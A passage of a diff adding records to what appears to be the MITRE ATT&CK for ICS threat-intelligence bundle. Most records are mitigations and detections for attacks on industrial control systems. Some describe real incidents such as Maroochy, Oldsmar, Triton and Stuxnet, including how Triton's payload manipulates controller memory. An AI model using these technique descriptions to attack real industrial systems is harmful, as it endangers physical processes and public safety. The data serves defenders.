"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c7aac6c9-da16-46e2-8cfa-dca07a0a7562", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.174Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04882fef-2a6b-40d0-a101-da9c76a3572e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Restrict the use of untrusted or unknown libraries, such as remote or unknown DLLs.\n", + "source_ref": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--268b9429-b1c6-4bc3-84cf-8512e8ef57a7", + "created": "2023-03-10T20:34:25.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T22:05:00.124Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary disabled alarms at four pumping stations, preventing notifications to the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--76654cf3-5cfe-4bf4-b134-806fd75b1ddb", + "created": "2022-09-20T20:55:00.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:25:44.859Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors utilized the operator HMI interface through the graphical user interface. This action led to immediate operator detection as they were able to see the adversary making changes on their screen.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--13809e98-1d74-4c39-b882-9d523c76cbde", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:07.929Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s imain.bin payload takes commands from the TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex) and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--41b87fd8-6e4d-4e53-a282-c85292fdaa22", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3f335e8f-68da-4b06-9d96-f371ddaf23e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.236Z", + "relationship_type": "mitigates", + "description": "Ensure wireless networks require the authentication of all devices, and that all wireless devices also authenticate network infrastructure devices (i.e., mutual authentication). For defense-in-depth purposes, utilize VPNs or ensure that application-layer protocols also authenticate the system or device. Use protocols that provide strong authentication (e.g., IEEE 802.1X), and enforce basic protections, such as MAC filtering, when stronger cryptographic techniques are not available.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08302021-aacf-428f-a0ce-e1034d925fb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e0da1f92-82b1-4096-86c4-1aef58ca89fb", + "created": "2023-03-10T20:08:40.601Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:08:40.601Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dbdd9a97-81df-40b8-b72d-ac67d121b8b3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.170Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6b5fd6d8-ef70-4896-b1a4-7b6c29c3a0d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9aa3364-a1eb-4776-ae03-c39b250545a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.185Z", + "relationship_type": "mitigates", + "description": "Review the integrity of project files to verify they have not been modified by adversary behavior. Verify a cryptographic hash for the file with a known trusted version, or look for other indicators of modification (e.g., timestamps).\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6d1906b4-e815-4688-86f1-ce61d403f8c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "All remote services should require strong authentication before providing user access.\n", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--52855d5d-e835-470f-a675-751c2779c861", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.140Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--fe22637e-7187-4990-b24a-5dc851eec736", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:55.507Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1d98f8c-aea2-4f06-9b0d-c543ed42c6a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.086Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2971151c-0e8a-4567-84dc-01cf5dd35005", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Digital signatures may be used to ensure application DLLs are authentic prior to execution.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--214eb531-411c-4b90-9dbf-dc0183cbb919", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:19.403Z", + "description": "Monitor executed commands and arguments that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--234da455-b795-4788-bc5d-22b4b58b2dc7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.212Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6b5d2643-b399-43aa-8ab1-7557a0446b07", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.147Z", + "relationship_type": "mitigates", + "description": "Only authorized personnel should be able to change settings for alarms.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--06c663f8-fcf1-47eb-ab79-284e93eafa6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.183Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--28afd84d-a53e-4b2f-9bee-133f7da6982a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:10:43.996Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) copies the input area of an I/O image into data blocks with a one second interval between copies, forming a 21 second recording of the input area. The input area contains information being passed to the PLC from a peripheral. For example, the current state of a valve or the temperature of a device. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d5b9b9c-058f-4782-80aa-9d501442a03d", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:07.441Z", + "description": "Alterations to the service binary path or the service startup type changed to disabled may be suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ab60fe4a-5860-410a-8bca-2cdbea95e5f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--4b57e41c-246f-44b3-b259-1811d5275e10", + "created": "2022-09-26T15:16:32.057Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:16:32.057Z", + "description": "Consult asset management systems to understand expected alarm settings.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1454196-0d86-49f2-8dcb-61145a16b21e", + "created": "2022-09-26T20:36:04.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:33:05.248Z", + "description": "Monitor for files accessed on removable media, particularly those with executable content.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b", + "type": "relationship", + "created": "2021-10-04T20:52:20.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Lazarus KillDisk April 2018", + "description": "Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + } + ], + "modified": "2021-10-04T20:54:09.057Z", + "description": "(Citation: ESET Lazarus KillDisk April 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83e5ebce-8d5d-43ca-a47f-ecb50ae8993a", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:52.932Z", + "description": "Monitor for newly constructed drive letters or mount points to removable media.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b69f31c3-6c12-4b81-8e74-9c58ea635fa4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.232Z", + "relationship_type": "mitigates", + "description": "Ensure that applications and devices do not store sensitive data or credentials insecurely (e.g., plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage). (Citation: CISA June 2013)\n", + "source_ref": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6895e54e-3968-41a9-9013-a082cd46fa44", + "created": "2020-05-14T14:40:26.221Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020." + }, + { + "source_name": 